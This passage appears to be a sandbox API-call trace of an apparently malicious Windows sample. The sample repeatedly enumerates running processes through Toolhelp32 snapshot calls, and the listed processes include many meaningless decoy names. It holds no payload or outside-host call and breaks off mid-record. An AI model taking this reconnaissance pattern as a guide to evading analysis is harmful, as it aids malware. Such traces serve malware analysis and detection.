szExeFile="svchost.exe")) returned 1 [0129.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0129.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.180] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0129.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.182] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.183] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0129.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0129.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0129.186] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.188] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.189] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0129.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0129.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0129.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0129.193] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0129.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0129.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0129.197] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0129.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0129.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0129.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0129.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0129.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0129.203] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0129.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0129.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0129.206] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0129.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0129.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0129.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0129.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0129.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0129.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0129.260] CloseHandle (hObject=0xbc) returned 1 [0129.260] Sleep (dwMilliseconds=0x12c) [0129.623] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0129.629] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.630] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0129.630] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0129.631] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.632] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0129.633] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.633] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0129.634] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0129.635] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0129.635] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0129.636] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.637] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.638] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.639] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.639] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.640] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0129.641] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.641] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.642] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0129.644] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.645] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.650] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0129.651] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0129.653] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0129.654] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.655] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.656] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0129.657] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0129.658] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0129.659] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0129.742] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0129.743] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0129.744] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0129.745] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0129.746] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0129.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0129.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0129.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0129.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0129.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0129.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0129.754] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0129.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0129.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0129.757] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0129.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, 